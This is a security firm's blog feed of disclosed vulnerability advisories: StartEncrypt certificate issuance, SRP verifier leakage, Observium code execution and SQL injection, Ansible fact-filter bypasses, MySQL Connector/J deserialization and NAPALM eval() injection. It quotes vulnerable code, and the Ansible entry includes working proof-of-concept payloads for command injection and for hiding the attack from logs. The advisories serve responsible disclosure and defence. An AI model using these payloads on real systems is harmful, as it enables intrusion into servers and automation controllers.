Normal view

There are new articles available, click to refresh the page.
Before yesterdaySector 7

StartEncrypt - obtaining valid SSL certificates for unauthorized domains

30 June 2016 at 00:00

Recently, we found a critical vulnerability in StartCom’s new StartEncrypt tool, that allows an attacker to gain valid SSL certificates for domains he does not control. While there are some restrictions on what domains the attack can be applied to, domains where the attack will work include google.com, facebook.com, live.com, dropbox.com and others.

StartCom, known for its CA service under the name of StartSSL, has recently released the StartEncrypt tool. Modeled after LetsEncrypt, this service allows for the easy and free installation of SSL certificates on servers. In the current age of surveillance and cybercrime, this is a great step forwards, since it enables website owners to provide their visitors with better security at small effort and no cost.

However, there is a lot that can go wrong with the automated issuance of SSL certificates. Before someone is issued a certificate for their domain, say computest.nl, the CA needs to check that the request is done by someone who is actually in control of the domain. For “Extended Validation” certificates this involves a lot of paperwork and manual checking, but for simple, so-called “Domain Validated” certificates, often an automated check is used by sending an email to the domain or asking the user to upload a file. The CA has a lot of freedom in how the check is performed, but ultimately, the requester is provided with a certificate that provides the same security no matter which CA issued it.

StartEncrypt

So, StartEncrypt. In order to make the issuance of certificates easy, this tool runs on your server (Windows or Linux), detects your webserver configuration, and requests DV certificates for the domains that were found in your config. Then, the StartCom API does a HTTP request to the website at the domain you requested a certificate for, and checks for the presence of a piece of proof that you have access to that website. If the proof is found, the API returns a certificate to the client, which then installs it in your config.

However, it appears that the StartEncrypt tool did not receive proper attention from security-minded people in the design and implementation phases. While the client contains numerous vulnerabilities, one in particular allows the attacker to “trick” the validation step.

The first bug

The API checks if a user is authorized to obtain a certificate for a domain by downloading a signature from that domain, by default from the path /signfile. However, the client chooses that path during a HTTP POST request to that API.

A malicious client can specify a path to any file on the server for which a certificate is requested. This means that, for example, anyone can obtain a certificate for sites like dropbox.com and github.com where users can upload their own files.

That’s not all

While this is serious, most websites don’t allow you to upload a file and then have it presented back to you in raw format like github and dropbox do. Another issue in the API however allows for much wider exploitation of this issue: the API follows redirects. So, if the URL specified in the “verifyRes” parameter returns a redirect to another URL, the API will follow that until it gets to the proof. Even if the redirect goes off-domain. Since the first redirect was to the domain that is being verified, the API considers the proof correct even if it is redirected to a different website.

This means that an attacker can obtain an SSL certificate for any website that either:

  • Allows users to upload files and serves them back raw, or
  • Has an “open redirect” vulnerafeature in it

Open redirects are pages that take a parameter that contains a URL, and redirect the user to it. This seems like a strange feature, but this mechanism is often implemented for instance in logout or login pages. After a successful logout, you will be redirected to some other page. That other page URL is included as a parameter to the logout page. For instance, http://mywebsite/logout?returnURL=/login might redirect you to /login after logout.

While many see open redirects as a vulnerability that needs fixing, others do not. Google for instance has excluded open redirects from their vulnerability reward program. By itself an open redirect is not exploitable, so it is understandable that many do not see it as a security issue. However, when combined with a vulnerability like the one present in StartEncrypt, the open redirect suddenly has great impact.

It’s actually even worse: the OAuth 2.0 specification practically mandates that an open redirect must be present in each implementation of the spec. For this reason, login.live.com and graph.facebook.com for instance contain open redirects.

When combining the path-bug with the open redirect, suddenly many more certificates can be obtained, like for google.com, paypal.com, linkedin.com, login.live.com and all those other websites with open redirects. While not every website has an open redirect feature, many do at some point in time.

That’s still not all

Apart from the vulnerability described above, we found some other vulnerabilities in the client while doing just a cursory check. We are only publishing those that according to StartCom have been fixed or are no issue. These include:

  • The client doesn’t check the server’s certificate for validity when connecting to the API, which is pretty ironic for an SSL tool.
  • The API doesn’t verify the content-type of the file it downloads for verification, so attackers can obtain certificates for any website where users can upload their own avatars (in combination with the above vulnerabilities of course)
  • The API only involves the server obtaining the raw RSA signature of the nonce. The signature file doesn’t identify the key nor the nonce that was used. This opens up the possibility of a “Duplicate-Signature Key Selection” attack, just like what Andrew Ayer discovered in the ACME protocol while LetsEncrypt was in beta, see also this post. As long as the signfile is on a domain, an attacker can obtain the signfile, start a new authorization and obtain a nonce and then pick their RSA private key in such a way that their private key verifies their nonce.
  • The private key on the server (/usr/local/StartEncrypt/conf/cert/tokenpri.key) is saved with mode 0666, so world-readable, which means any local user can read or modify it.

All in all, it doesn’t seem like a lot of attention was paid to security in the design and implementation of this piece of software.

Disclosure

As a security company, we constantly do security research. Usually for paying customers. In this case however, we started looking at StartEncrypt out of interest and because of the high impact any issues have for the internet as a whole. That is also why we are disclosing this issue: we believe that CA’s need to become much more aware of the vital role they play in internet security and need to start taking their software security more serious.

Of course, we disclosed the issue to StartCom prior to publishing. The vulnerabilities we described were found in the Linux x86_64 binary version 1.0.0.1. The timeline:

June 22, 2016: issue discovered
June 23, 2016: issue disclosed to StartCom after obtaining email address by phone
June 23, 2016: StartCom takes API offline
June 28, 2016: StartCom takes API online again, incompatible with current client
June 28, 2016: StartCom updates the Windows-client on the download page
June 29, 2016: StartCom updates the Linux-client on the download page, keeping the version number at 1.0.0.1
June 30, 2016: StartCom informs Computest of which issues have been fixed

Conclusion

StartCom launched a tool that makes it easier to secure communications on the internet, which is something we applaud. In doing so however, they seem to have taken some shortcuts in engineering. Using their tool, an attacker is able to obtain certificates for other domains like google.com, linkedin.com, login.live.com and dropbox.com.

In our opinion, StartCom made a mistake by publishing StartEncrypt the way it is. Although they appreciated the issues for the impact they had and were swift in their response, it is apparent that too little attention was paid to security both in design (allowing the user to specify the path) and implementation (for instance in following redirects, static linking against a vulnerable library, and so on). Furthermore, they didn’t learn from the issues LetsEncrypt faced when in beta.

But the issue is broader. As users of the internet, we trust the CA’s to provide us with a base for trust upon which we do business and share our lives online. When a single CA publishes software with this level of security, the trust in the CA system as a whole is undermined.

cSRP/srpforjava - obtaining of hashed passwords

18 August 2016 at 00:00

In this blog we’ll look at an interesting vulnerability in some implementations of a widely used authentication protocol; Secure Remote Password (SRP). We’ll dive into the cryptography details to see what implications a little mathematical oversight has for the security of the whole protocol.

This vulnerability was discovered while evaluating some different implementations of the SRP 6a protocol.

The problem was initially identified in cSRP (which also affects PySRP if using the C module for acceleration), and was also found in srpforjava. It’s not clear how many users these projects have, but regardless the bug is interesting enough to discuss by itself.

SRP: What is it good for?

SRP is a popular choice for linking devices or apps to a master server using a short password or pin code. SRP is often used for authentication that involves a password, like in mobile banking apps (for instance the ING mobile banking app in the Netherlands) but also in Steam.

Quote from http://srp.stanford.edu/: “The Secure Remote Password protocol performs secure remote authentication of short human-memorizable passwords and resists both passive and active network attacks.”

In other words, being able to read and mess with network traffic of a legitimate client does not help an attacker log in. The fastest way to break in is to just try every possible password. The server can prevent this using rate limiting or by locking accounts.

SRP in three steps

The protocol consists of three stages:

  1. Client and server exchange public ephemeral values.
  2. Client and server calculate the session key.
  3. Client and server prove to each other that they know the session key. This can optionally be integrated with the normal communication that happens after authentication.

For the purpose of this blog only the first part of the protocol is relevant. In this stage the client sends its ephemeral value along with a username, and the server responds with its own ephemeral value and the random salt value for the given user.

How SRP checks your password

In the first part of the protocol the client and server exchange “ephemeral values”, which are large numbers calculated according to the SRP protocol. These values actually play multiple roles at once in the SRP protocol. This is how it performs authentication and establishes a shared session key in just one round trip!

The first role is as a kind of key exchange in a way that is similar to how Diffie-Hellman key exchange works. In Diffie-Hellman both parties generate a random number r which is their private value, and use this to generate a public value using the formula (g ** r) % N, where g and N are public fixed parameters. In SRP the client generates its public value in exactly this way, but the server does something slightly different.

In SRP the Diffie-Hellman key exchange is altered to additionally force the client to prove that it knows the password for a certain user. One way to think of this is that the server alters its public value based on the password for the given user, and the client needs to compensate for this alteration in order to derive the same session key as the server. The client can only perform this compensation if it knows the password.

In order to perform this calculation the server uses a “verifier” value for the desired user. In many ways a verifier is like a password hash. It is only derived from the username, the password, and the salt. Since the username and salt are stored in plain text on the server and are sent in plain text over the network, the password is the only unknown part and an attacker can generate verifiers for every possible password until he finds a match. Since a verifier is generated using only a single hash operation and a modular exponentiation in most SRP implementations, it is fairly easy to brute force compared to modern password hashing methods like scrypt.

One other way this “verifier” value is like a password hash, is that it’s not sent over the network, and even if it is stolen from the server, a hacker can’t use it to log in directly. Because of how it’s generated the server can use it to calculate its public ephemeral value, but a client can’t use it to calculate the session key. A client needs the actual password for that.

How the hacker gets your password: the bug

Warning: math ahead! It helps if you understand some algebra, but hopefully it’s not required.

Now we come to the actual bug, which is in the calculation of the server’s public ephemeral value. This is the formula to calculate this value:

B = (k * v + ((g ** b) % N)) % N

The ((g ** b) % N) part is just the standard Diffie-Hellman calculation of a public value from the private random value b. The values g and N are the public Diffie-Hellman parameters.

The addition of k * v is the extra adjustment for authentication in the SRP protocol. The value k is calculated by hashing the (public) g and N values (so k is also public), while v is the verifier for the user that is logging in.

In the buggy implementations, the actual calculation for B is slightly different:

B' = k * v + ((g ** b) % N)

In other words, the final reduction modulo N is missing. As it turns out, that is actually very important! Because B has this final modulo operation, the public Diffie-Hellman value and the value derived from the verifier are hopelessly mixed up, and we can’t separate the two at all anymore.

But what about B'? Well, we can divide it by k.

B' = (k * v + ((g ** b) % N)) / k

Let’s define i and j as the unknown quotient and remainder of dividing the public Diffie-Hellman value ((g ** b) % N) by k:

((g ** b) % N) = k * i + j
B' = (k * v + (k * i + j)) / k

By definition j is smaller than k so we disregard it:

B' = (k * v + k * i) / k
B' / k = v + i

Lets write |B| for the (approximate) length of B in bits. I’m going to ask you to just take my word for it that values that came from a modular exponentiation ((g**x) % N) (like v) are about as long as N (say 2048 bit), and values resulting from a hash (like k) are about as long as whatever the size of that hash function’s output is (say 256 bits).

Now we know these things about the lengths of v and i:

|v| ~= |N|
|i| ~= |N| - |k|

In words: v is 2048 bits, while i is (2048 – 256) bits long. So the value i is about 256 bits shorter than v.

Take a look at B' / k again with that in mind:

B' / k = v + i

This means that the top 256 bits of B’ / k are equal to the top 256 bits of the verifier v! In other words, the server leaks the top 256 bits of the verifier.

What is that good for? Well, the odds of two different verifiers having the same top 256 bits are impossibly small. This means that these top 256 bits are enough to check whether two verifiers are equal, which means we can perform offline password cracking using this leaked part of the verifier.

Note that all bit lengths are approximate, and in any case the values 2048 and 256 depend on the Diffie-Hellman parameters and hash function used.

In short

Because of this bug the server will send a value equivalent to a password hash to any client that wants to log in. This can then be cracked offline, which totally breaks the guarantees of the SRP protocol.

The fix

Tom Cocagne, the maintainer of cSRP, was very quick to fix the affected code after we reported the bug. The fix is to perform the missing modulo operation.

The author of srpforjava was contacted later, after we discovered that this library was also affected. We’ve sent a patch, but this is not applied yet.

Both libraries haven’t had a new release in a long time, and it’s difficult to determine who’s using these libraries. Hopefully this blog post will reach them.

Because the client performs all operations modulo N, the fact that the server now returns different B values does not affect the normal operation of the protocol at all. Clients are compatible with both the patched and unpatched server.

Do not try this at home

This article tries to explain SRP in a simplified way. Please do not go and implement SRP yourself. In fact, please do not implement any cryptography code unless you are an expert! When it comes to cryptography, every detail matters. Even the ones the textbook doesn’t mention.

Observium - unauthenticated remote code execution

10 November 2016 at 00:00

During a recent penetration test Computest found and exploited various issues in Observium, going from unauthenticated user to full shell access as root. We reported these issues to the Observium project for the benefit of our customer and other members of the community.

This was not a full audit and further issues may or may not be present.

(Note about affected versions: The Observium project does not provide a way to download older releases for non-paying users, so there was no way to check whether these problems exist in older versions. All information given here applies to the latest Community Edition as of 2016-10-05.)

About Observium

“Observium is a low-maintenance auto-discovering network monitoring platform supporting a wide range of device types, platforms and operating systems including Cisco, Windows, Linux, HP, Juniper, Dell, FreeBSD, Brocade, Netscaler, NetApp and many more.” - observium.org

Issue #1: Deserialization of untrusted data

Observium uses the get_vars() function in various places to parse the user-supplied GET, POST and COOKIE values. This function will attempt to unserialize data from any of the requested fields using the PHP unserialize() function.

Deserialization of untrusted data is in general considered a very bad idea, but the practical impact of such issues can vary.

Various memory corruption issues have been identified in the PHP unserialize() function in the past, which can lead directly to remote code execution. On patched versions of PHP exploitability depends on the application.

In the case of Observium the issue can be exploited to write mostly user-controlled data to an arbitrary file, such as a PHP session file. Computest was able to exploit this issue to create a valid Observium admin session.

The function get_vars() eventually calls var_decode(), which unserializes the user input.

./includes/common.inc.php:

function var_decode($string, $method = 'serialize')
{
 $value = base64_decode($string, TRUE);
 if ($value === FALSE)
 {
   // This is not base64 string, return original var
   return $string;
 }

 switch ($method)
 {
   case 'json':
     if ($string === 'bnVsbA==') { return NULL; };
     $decoded = @json_decode($value, TRUE);
     if ($decoded !== NULL)
     {
       // JSON encoded string detected
       return $decoded;
     }
     break;
   default:
     if ($value === 'b:0;') { return FALSE; };
     $decoded = @unserialize($value);
     if ($decoded !== FALSE)
     {
       // Serialized encoded string detected
       return $decoded;
     }
 }

Issue #2: Admins can inject shell commands, possibly as root

Admin users can change the path of various system utilities used by Observium. These paths are directly used as shell commands, and there is no restriction on their contents.

This is not considered a bug by the Observium project, as Admin users are considered to be trusted.

The Observium installation guide recommends running various Observium scripts from cron. The instructions given in the installation guide will result in these scripts being run as root, and invoking the user- controllable shell commands as root.

Since this functionality resulted in an escalation of privilege from web application user to system root user it is included in this advisory despite the fact that it appears to involve no unintended behavior in Observium.

Even if the Observium system is not used for anything else, privileged users log into this system (and may reuse passwords elsewhere), and the system as a whole may have a privileged network position due to its use as a monitoring tool. Various other credentials (SNMP etc) may also be of interest to an attacker.

The function rrdtool_pipe_open() uses the Admin-supplied config variable to build and run a command:

./includes/rrdtool.inc.php:

function rrdtool_pipe_open(&$rrd_process, &$rrd_pipes)
{
 global $config;

 $command = $config['rrdtool'] . " -"; // Waits for input via standard input (STDIN)

 $descriptorspec = array(
    0 => array("pipe", "r"),  // stdin
    1 => array("pipe", "w"),  // stdout
    2 => array("pipe", "w")   // stderr
 );

 $cwd = $config['rrd_dir'];
 $env = array();

 $rrd_process = proc_open($command, $descriptorspec, $rrd_pipes, $cwd, $env);

Issue #3: Incorrect use of cryptography in event feed authentication

Observium contains an RSS event feed functionality. Users can generate an RSS URL that displays the events that they have access to.

Since RSS viewers may not have access to the user’s session cookies, the user is authenticated with a user-specific token in the feed URL.

This token consists of encrypted data, and the integrity of this data is not verified. This allows a user to inject essentially random data that the Observium code will treat as trusted.

By sending arbitrary random tokens a user has at least a 1/65536 chance of viewing the feed with full admin permissions, since admin privileges are granted if the decryption of this random token happens to start with the two-character string 1| (1 being the user id of the admin account).

In general a brute force attack will gain access to the feed with admin privileges in about half an hour.

./html/feed.php:

if (isset($_GET['hash']) && is_numeric($_GET['id']))
{
 $key = get_user_pref($_GET['id'], 'atom_key');
 $data = explode('|', decrypt($_GET['hash'], $key)); // user_id|user_level|auth_mechanism

 $user_id    = $data[0];
 $user_level = $data[1]; // FIXME, need new way for check userlevel, because it can be changed
 if (count($data) == 3)
 {
   $check_auth_mechanism = $config['auth_mechanism'] == $data[2];
 } else {
   $check_auth_mechanism = TRUE; // Old way
 }

 if ($user_id == $_GET['id'] && $check_auth_mechanism)
 {
   session_start();
   $_SESSION['user_id']   = $user_id;
   $_SESSION['userlevel'] = $user_level;

(Note: this session is destroyed at the end of the page)

Issue #4: Authenticated SQL injection

One of the graphs supported by Observium contains a SQL injection problem. This code is only reachable if unauthenticated users are permitted to view this graph, or if the user is authenticated.

The problem lies in the port_mac_acc_total graph.

When the stat parameter is set to a non-empty value that is not bits or pkts the sort parameter will be used in a SQL statement without escaping or validation.

The id parameter can be set to an arbitary numeric value, the SQL is executed regardless of whether this is a valid identifier.

This can be exploited to leak various configuration details including the password hashes of Observium users.

./html/includes/graphs/port/mac_acc_total.inc.php:

$port      = (int)$_GET['id'];
if ($_GET['stat']) { $stat      = $_GET['stat']; } else { $stat = "bits"; }
$sort      = $_GET['sort'];

if (is_numeric($_GET['topn'])) { $topn = $_GET['topn']; } else { $topn = '10'; }

include_once($config['html_dir']."/includes/graphs/common.inc.php");

if ($stat == "pkts")
{
 $units='pps'; $unit = 'p'; $multiplier = '1';
 $colours_in  = 'purples';
 $colours_out = 'oranges';
 $prefix = "P";
 if ($sort == "in")
 {
   $sort = "pkts_input_rate";
 } elseif ($sort == "out") {
   $sort = "pkts_output_rate";
 } else {
   $sort = "bps";
 }
} elseif ($stat == "bits") {
 $units='bps'; $unit='B'; $multiplier='8';
 $colours_in  = 'greens';
 $colours_out = 'blues';
 if ($sort == "in")
 {
    $sort = "bytes_input_rate";
 } elseif ($sort == "out") {
    $sort = "bytes_output_rate";
 } else {
   $sort = "bps";
 }
}

$mas = dbFetchRows("SELECT *, (bytes_input_rate + bytes_output_rate) AS bps,
       (pkts_input_rate + pkts_output_rate) AS pps
       FROM `mac_accounting`
       LEFT JOIN  `mac_accounting-state` ON  `mac_accounting`.ma_id =  `mac_accounting-state`.ma_id
       WHERE `mac_accounting`.port_id = ?
       ORDER BY $sort DESC LIMIT 0," . $topn, array($port));

Mitigation

The Observium web application can be placed behind a firewall or protected with an additional layer of authentication. Even then, admin users should be treated with care as they are able to execute commands (probably as root) until the issues are patched.

The various cron jobs needed by Observium can be run as the website user (e.g. www-data) or a user created specifically for that purpose instead of as root.

Resolution

Observium has released a new Community Edition to resolve these issues.

The Observium project does not provide changelogs or version numbers for community releases.

Timeline

2016-09-01 Issue discovered during penetration test
2016-10-21 Vendor contacted
2016-10-21 Vendor responds that they are working on a fix
2016-10-26 Vendor publishes new version on website
2016-10-28 Vendor asks Computest to comment on changes
2016-10-31 Computest responds with quick review of changes
2016-11-10 Advisory published

Ansible - command execution on Ansible controller from host

9 January 2017 at 00:00

During a summary code review of Ansible, Computest found and exploited several issues that allow a compromised host to execute commands on the Ansible controller and thus gain access to the other hosts controlled by that controller.

This was not a full audit and further issues may or may not be present.

About Ansible

“Ansible is an open-source automation engine that automates cloud provisioning, configuration management, and application deployment. Once installed on a control node, Ansible, which is an agentless architecture, connects to a managed node through the default OpenSSH connection type.” - wikipedia.org

Technical Background

A big threat to a configuration management system like Ansible, Puppet, Salt Stack and others, is compromise of the central node. In Ansible terms this is called the Controller. If the Controller is compromised, an attacker has unfettered access to all hosts that are controlled by the Controller. As such, in any deployment, the central node receives extra attention in terms of security measures and isolation, and threats to this node are taken even more seriously.

Fortunately for team blue, in the case of Ansible the attack surface of the Controller is pretty small. Since Ansible is agent-less and based on push, the Controller does not expose any services to hosts.

A very interesting bit of attack surface though is in the Facts. When Ansible runs on a host, a JSON object with Facts is returned to the Controller. The Controller uses these facts for various housekeeping purposes. Some facts have special meaning, like the fact ansible_python_interpreter and ansible_connection. The former defines the command to be run when Ansible is looking for the python interpreter, and the second determines the host Ansible is running against. If an attacker is able to control the first fact he can execute an arbitrary command, and if he is able to control the second fact he is able to execute on an arbitrary (Ansible-controlled) host. This can be set to local to execute on the Controller itself.

Because of this scenario, Ansible filters out certain facts when reading the facts that a host returns. However, we have found 6 ways to bypass this filter.

In the scenarios below, we will use the following variables:

PAYLOAD = "touch /tmp/foobarbaz"

# Define some ways to execute our payload.
LOOKUP = "lookup('pipe', '%s')" % PAYLOAD
INTERPRETER_FACTS = {
    # Note that it echoes an empty dictionary {} (it's not a format string).
    'ansible_python_interpreter': '%s; cat > /dev/null; echo {}' % PAYLOAD,
    'ansible_connection': 'local',
    # Become is usually enabled on the remote host, but on the Ansible
    # controller it's likely password protected. Disable it to prevent
    # password prompts.
    'ansible_become': False,
}

Bypass #1: Adding a host

Ansible allows modules to add hosts or update the inventory. This can be very useful, for instance when the inventory needs to be retrieved from a IaaS platform like as the AWS module does.

If we’re lucky, we can guess the inventory_hostname, in which case the host_vars are overwritten and they will be in effect at the next task. If host_name doesn’t match inventory_hostname, it might get executed in the play for the next hostgroup, also depending on the limits set on the commandline.

# (Note that when data["add_host"] is set,
# data["ansible_facts"] is ignored.)
data['add_host'] = {
    # assume that host_name is the same as inventory_hostname
    'host_name': socket.gethostname(),
    'host_vars': INTERPRETER_FACTS,
}

lib/ansible/plugins/strategy/__init__.py#L447

Bypass #2: Conditionals

Ansible actions allow for conditionals. If we know the exact contents of a when clause, and we register it as a fact, a special case checks whether the when clause matches a variable. In that case it replaces it with its contents and evaluates them.

# Known conditionals, separated by newlines
known_conditionals_str = """
ansible_os_family == 'Debian'
ansible_os_family == "Debian"
ansible_os_family == 'RedHat'
ansible_os_family == "RedHat"
ansible_distribution == "CentOS"
result|failed
item > 5
foo is defined
"""
known_conditionals = [x.strip() for x in known_conditionals_str.split('\n')]
for known_conditional in known_conditionals:
    data['ansible_facts'][known_conditional] = LOOKUP

Bypass #3: Template injection in stat module

The template module/action merges its results with those of the stat module. This allows us to bypass the stripping of magic variables from ansible_facts, because they’re at an unexpected location in the result tree.

data.update({
    'stat': {
        'exists': True,
        'isdir': False,
        'checksum': {
            'rc': 0,
            'ansible_facts': INTERPRETER_FACTS,
        },
    }
})

lib/ansible/plugins/action/template.py#L39
lib/ansible/plugins/action/template.py#L49
lib/ansible/plugins/action/template.py#L146
lib/ansible/plugins/action/__init__.py#L678

Bypass #4: Template injection by changing jinja syntax

Remote facts always get quoted. set_fact unquotes them by evaluating them. UnsafeProxy was designed to defend against unquoting by transforming jinja syntax into jinja comments, effectively disabling injection.

Bypass the filtering of {{ and {% by changing the jinja syntax. The {{}} is needed to make it look like a variable. This works against:

- set_fact: foo="{{ansible_os_family}}"
- command: echo "{{foo}}
data['ansible_facts'].update({
    'exploit_set_fact': True,
    'ansible_os_family': "#jinja2:variable_start_string:'[[',variable_end_string:']]',block_start_string:'[%',block_end_string:'%]'\n{{}}\n[[ansible_host]][[lookup('pipe', '" + PAYLOAD  + "')]]",
})

Bypass #5: Template injection in dict keys

Strings and lists are properly cleaned up, but dictionary keys are not. This works against:

- set_fact: foo="some prefix {{ansible_os_family}} and/or suffix"
- command: echo "{{foo}}

The prefix and/or suffix are needed in order to turn the dict into a string, otherwise the value would remain a dict.

data['ansible_facts'].update({
    'exploit_set_fact': True,
    'ansible_os_family': { "{{ %s }}" % LOOKUP: ''},
})

Bypass #6: Template injection using safe_eval

There’s a special case for evaluating strings that look like a list or dict. Strings that begin with { or [ are evaluated by safe_eval. This allows us to bypass the removal of jinja syntax: we use the whitelisted Python to re-create a bit of Jinja template that is interpreted.

This works against:

- set_fact: foo="{{ansible_os_family}}"
- command: echo "{{foo}}
data['ansible_facts'].update({
    'exploit_set_fact': True,
    'ansible_os_family': """[ '{'*2 + "%s" + '}'*2 ]""" % LOOKUP,
})

Issue: Disabling verbosity

Verbosity can be set on the controller to get more debugging information. This verbosity is controlled through a custom fact. A host however can overwrite this fact and set the verbosity level to 0, hiding exploitation attempts.

data['_ansible_verbose_override'] = 0

lib/ansible/plugins/callback/default.py#L99
lib/ansible/plugins/callback/default.py#L208

Issue: Overwriting files

Roles usually contain custom facts that are defined in defaults/main.yml, intending to be overwritten by the inventory (with group and host vars). These facts can be overwritten by the remote host, due to the variable precedence. Some of these facts may be used to specify the location of a file that will be copied to the remote host. The attacker may change it to /etc/passwd. The opposite is also true, he may be able to overwrite files on the Controller. One example is the usage of a password lookup with where the filename contains a variable.

Mitigation

Computest is not aware of mitigations short of installing fixed versions of the software.

Resolution

Ansible has released new versions that fix the vulnerabilities described in this advisory: version 2.1.4 for the 2.1 branch and 2.2.1 for the 2.2 branch.

Conclusion

The handling of Facts in Ansible suffers from too many special cases that allow for the bypassing of filtering. We found these issues in just hours of code review, which can be interpreted as a sign of very poor security. However, we don’t believe this is the case.

The attack surface of the Controller is very small, as it consists mainly of the Facts. We believe that it is very well possible to solve the filtering and quoting of Facts in a sound way, and that when this has been done, the opportunity for attack in this threat model is very small.

Furthermore, the Ansible security team has been understanding and professional in their communication around this issue, which is a good sign for the handling of future issues.

Timeline

2016-12-08 First contact with Ansible security team
2016-12-09 First contact with Redhat security team ([email protected])
2016-12-09 Submitted PoC and description to [email protected]
2016-12-13 Ansible confirms issue and severity
2016-12-15 Ansible informs us of intent to disclose after holidays
2017-01-05 Ansible informs us of disclosure date and fix versions
2017-01-09 Ansible issues fixed version\

MySQL Connector/J - Unexpected deserialisation of Java objects

25 April 2017 at 00:00

A malicious MySQL database or a database containing malicious contents can obtain remote code execution in applications connecting using MySQL Connector/J.

Technical Background

MySQL Connector/J is a driver for MySQL adhering to the Java JDBC interface. One of the features offered by MySQL Connector/J is support for automatic serialization and deserialization of Java objects, to make it easy to store arbitrary objects in the database.

When deserializing objects, it is important to never deserialize objects received from untrusted sources. As certain functions are automatically called on objects during deserialization and destruction, attackers can combine objects in unexpected ways to call specific functions, eventually leading to the execution of arbitrary code (depending on which classes are loaded). As the code is often executed as soon as the object is constructed or destructed, additional type-checking on the constructed object is not enough to protect against this.

MySQL Connector/J requires the flag autoDeserialize to be set to true before objects are automatically deserialized, which should only be set when the database and its contents are fully trusted by the application.

Vulnerability

During a short evaluation of the MySQL Connector/J source code, a method was found to deserialize objects from the database when this flag is not set and when API functions are used which do not imply the deserialization of objects at all.

The conditions are the following:

  • The flag useServerPrepStmts is set to true. With this flag enabled, the server caches prepared SQL statements and arguments are sent to it separately. As this allows statements to be reused, it is often enabled for increased performance.

  • The application is reading from a column having type BLOB, or the similar TINYBLOB, MEDIUMBLOB or LONGBLOB.

  • The application is reading from this column using .getString() or one of the functions reading numeric values (which are first read as strings and then parsed as numbers). Notably not .getBytes() or .getObject().

When these conditions are met, MySQL Connector/J will check if the data starts with 0xAC 0xED (the magic bytes of a serialized Java object) and if so, attempt to deserialize it and try to convert it to a string.

The vulnerable code:

case Types.LONGVARBINARY:

if (!field.isBlob()) {
    return extractStringFromNativeColumn(columnIndex, mysqlType);
} else if (!field.isBinary()) {
    return extractStringFromNativeColumn(columnIndex, mysqlType);
} else {
    byte[] data = getBytes(columnIndex);
    Object obj = data;

    if ((data != null) && (data.length >= 2)) {
        if ((data[0] == -84) && (data[1] == -19)) {
            // Serialized object?
            try {
                ByteArrayInputStream bytesIn = new ByteArrayInputStream(data);
                ObjectInputStream objIn = new ObjectInputStream(bytesIn);
                obj = objIn.readObject();
                objIn.close();
                bytesIn.close();
            } catch (ClassNotFoundException cnfe) {
                throw SQLError.createSQLException(Messages.getString("ResultSet.Class_not_found___91") + cnfe.toString()
                        + Messages.getString("ResultSet._while_reading_serialized_object_92"), getExceptionInterceptor());
            } catch (IOException ex) {
                obj = data; // not serialized?
            }
        }

        return obj.toString();
    }

src/com/mysql/jdbc/ResultSetImpl.java#L3422-L3450

The combination of a column of type BLOB and the vulnerable functions does not follow common best practices for using a database: BLOB columns are meant to store arbitrary binary data, which should be read using .getBytes(). However, there are many scenarios where this can still be exploited by an attacker:

  • An application does not follow best practices and stores text (or numbers) in a column of type BLOB and an attacker can insert arbitrary binary data into this column.

  • An application is configured to connect to a remote untrusted database or over an unencrypted connection which is intercepted by an attacker.

  • An application has an SQL injection vulnerability which allows an attacker to change the type of a columm to BLOB.

Impact

An attacker who is able to abuse this vulnerability, can have the application deserialize arbitrary objects. The direct impact is that the attacker can call into any loaded classes. Often, but depending on the application, this can be leveraged to gain code execution by calling into loaded classes that perform actions on files or system commands.

Resolution

The vulnerability can be resolved by updating MySQL Connector/J to version 5.1.41 and ensuring the flag autoDeserialize is not set.

Mitigation

This vulnerability can be mitigated on older versions by ensuring the flags autoDeserialize and useServerPrepStmts are not set.

Conclusion

MySQL Connector/J will (under specific conditions) unexpectedly deserialize objects from a MySQL database, allowing remote code execution. This could be used by attackers to escalate access to a database into remote code execution or possibly allow remote code execution by any user who can insert data into a database.

Timeline

2017-01-23: Issue reported to [email protected].
2017-01-23: Received a confirmation that the bug was under investigation.
2017-01-27: Publicly fixed in commit 6189e718de5b6c6115aee45dd7a480081c129d68
2017-02-24: Received an automatic email that a fix is ready and that an advisory will be published in a future Critical Patch Update.
2017-02-28: Fix released in version 5.1.41.
2017-03-24: Received an automatic email that a fix is ready and that an advisory will be published in a future Critical Patch Update.
2017-04-18: Oracle published Critical Patch Update April 2017, without this issue.
2017-04-19: Contacted Oracle to ask if a CVE number has been assigned to this issue.
2017-04-19: Received a reply from Oracle that they were verifying which versions are vulnerable.
2017-04-21: Oracle published revision 2 of the Critical Patch Update of April 2017, including this issue.

NAPALM - command execution on NAPLM controller from host

12 July 2017 at 00:00

During a summary code review of NAPALM, Computest found and exploited several issues that allow a compromised host to execute commands on the NAPALM controller and thus gain access to the other hosts controlled by that controller.

This was not a full audit and further issues may or may not be present.

About NAPALM

NAPALM (Network Automation and Programmability Abstraction Layer with Multivendor support) is a Python library that implements a set of functions to interact with different router vendor devices using a unified API.

NAPALM supports several methods to connect to the devices, to manipulate configurations or to retrieve data.

(Taken from their README)

Technical Background

A big threat to a configuration management system like NAPALM, Ansible, Salt Stack and others is compromise of the central node, or controller. If the controller is compromised, an attacker has unfettered access to all hosts that are controlled by the controller. As such, in any deployment, the central node receives extra attention in terms of security measures and isolation, and threats to this node are taken even more seriously.

Issue: Unsafe eval() when validating configurations

The validator allows for a number comparison using < and >. This is handled by the compare_numeric() function in napalm-base/validator.py. The function assumes that the value that is retrieved from the router is also a number and continues to use the eval() function for the actual comparison. However, a compromised device can of course also return an arbitrary string, which will be evaluated.

def compare_numeric(src_num, dst_num):
    """Compare numerical values. You can use '<%d','>%d'."""
    complies = eval(str(dst_num)+src_num)
    if not isinstance(complies, bool):
        return False
    return complies

Issue 2: Unsafe eval() in the IOS XR driver

The eval() function is also used quite extensively in the IOS XR driver. Its use case seems to be to transform a string, from the API, which contains true or false to a Python boolean. When the router is compromised however, the string could contain an arbitrary value that is passed to the eval() function. The difficulty in exploiting this would be that the value is first passed to the title() function before it is evaluated as Python code. The title() function capitalizes the first character of each word in a string.

For example:

multipath = eval((napalm_base.helpers.find_txt(
                bgp_group, 'NeighborGroupAFTable/NeighborGroupAF/Multipath') or 'false').title())

napalm_iosxr/iosxr.py#L821
napalm_iosxr/iosxr.py#L821
napalm_iosxr/iosxr.py#L952
napalm_iosxr/iosxr.py#L966
napalm_iosxr/iosxr.py#L968
napalm_iosxr/iosxr.py#L970
napalm_iosxr/iosxr.py#L1003
napalm_iosxr/iosxr.py#L1005
napalm_iosxr/iosxr.py#L1145
napalm_iosxr/iosxr.py#L1368

Mitigation

